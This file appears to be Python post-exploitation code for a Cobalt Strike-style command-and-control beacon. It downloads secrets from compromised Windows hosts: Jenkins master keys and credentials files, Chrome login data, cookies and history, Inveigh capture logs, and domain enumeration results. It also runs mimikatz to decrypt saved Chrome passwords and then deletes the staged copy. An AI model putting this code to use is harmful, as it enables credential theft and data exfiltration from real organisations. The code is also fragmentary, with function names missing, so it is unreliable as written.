def _(bid): #temp = r'{}\AppData\Local'.format(helpers.guess_home(bid)) temp = r'{}'.format(helpers.guess_home(bid)) out_file = r'{}\c'.format(temp) dest = r'{}\temp.exe'.format(temp) aggressor.brm(bid, dest) aggressor.bdownload(bid, out_file)
def _(bid, home=None): if not home: home = helpers.guess_home(bid) directory = r'{}\AppData\Roaming\Microsoft'.format(home) aggressor.btask( bid, 'Tasked beacon to grab inveigh files from {}'.format(directory)) for fname in ('clear', 'log', 'v1', 'v2', 'form'): aggressor.bdownload(bid, r'{}\{}'.format(directory, fname))
def _(bid, host=None): jenkins_dir = r'C:\program files (x86)\jenkins' files = [ 'secret.key', 'queue.xml', 'config.xml', 'jenkins.xml', 'github-plugin-configuration.xml', 'credentials.xml', 'scriptApproval.xml', 'scm-sync-configuration.xml', 'secrets/master.key', 'secrets/hudson.util.Secret' ] if host: prefix = helpers.path_to_unc(host, jenkins_dir) aggressor.btask( bid, 'Tasked beacon to download files in {}: {}'.format( prefix, ', '.join(files))) for fname in files: path = r'{}\{}'.format(prefix, fname) aggressor.bdownload(bid, path, silent=True)
def _(bid): chrome_dir = r'%localappdata%\Google\Chrome\User Data\Default' chrome_dir_guessed = chrome_dir.replace( '%localappdata%', r'{}\AppData\Local'.format(helpers.guess_home(bid))) login_data = r'{}\Login Data'.format(chrome_dir_guessed) cookies = r'{}\Cookies'.format(chrome_dir_guessed) history = r'{}\History'.format(chrome_dir_guessed) bookmarks = r'{}\Bookmarks'.format(chrome_dir_guessed) web_data = r'{}\Web Data'.format(chrome_dir_guessed) login_data_copied = '{}.bak2'.format(login_data) cookies_copied = '{}.bak2'.format(cookies) # non-protected files (History/Bookmarks) aggressor.bdownload(bid, history) aggressor.bdownload(bid, bookmarks) aggressor.bdownload(bid, web_data) # protected files (Login Data/Cookies) #aggressor.bshell(bid, 'copy "{}" "{}"'.format(login_data, login_data_copied)) aggressor.bcp(bid, login_data, login_data_copied) #aggressor.bshell(bid, 'copy "{}" "{}"'.format(cookies, cookies_copied)) #aggressor.bmimikatz(bid, r'dpapi::chrome /in:"{}" /unprotect'.format(cookies_copied)) aggressor.bmimikatz( bid, r'dpapi::chrome /in:"{}" /unprotect'.format(login_data_copied)) aggressor.brm(bid, login_data_copied)
def _(bid, *files): for fname in files: aggressor.bdownload(bid, fname)
def callback(path): aggressor.bdownload(bid, path)
def callback(path): ext = path.split('.')[-1] if ext in extensions: aggressor.bdownload(bid, path)
def _(bid, directory, *files): for fname in files: full = r'{}\{}'.format(directory, fname) aggressor.bdownload(bid, full)
def _(bid, *args): fname = ' '.join(args) aggressor.bdownload(bid, fname)
def _(bid): temp = helpers.guess_temp(bid) aggressor.btask( bid, 'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2' ) aggressor.bdownload(bid, r'{}\objects.domain'.format(temp)) aggressor.bdownload(bid, r'{}\policy.domain'.format(temp)) aggressor.bdownload(bid, r'{}\sites.domain'.format(temp)) aggressor.bdownload(bid, r'{}\subnets.domain'.format(temp)) aggressor.bdownload(bid, r'{}\gpo_localgroups.domain'.format(temp)) aggressor.bdownload(bid, r'{}\gpo_delegations.domain'.format(temp)) aggressor.bdownload(bid, r'{}\gpo_acls.domain'.format(temp)) aggressor.bdownload(bid, r'{}\trusts.domain'.format(temp)) aggressor.bdownload(bid, r'{}\managers.domain'.format(temp)) aggressor.bdownload(bid, r'{}\interesting_acls.domain'.format(temp))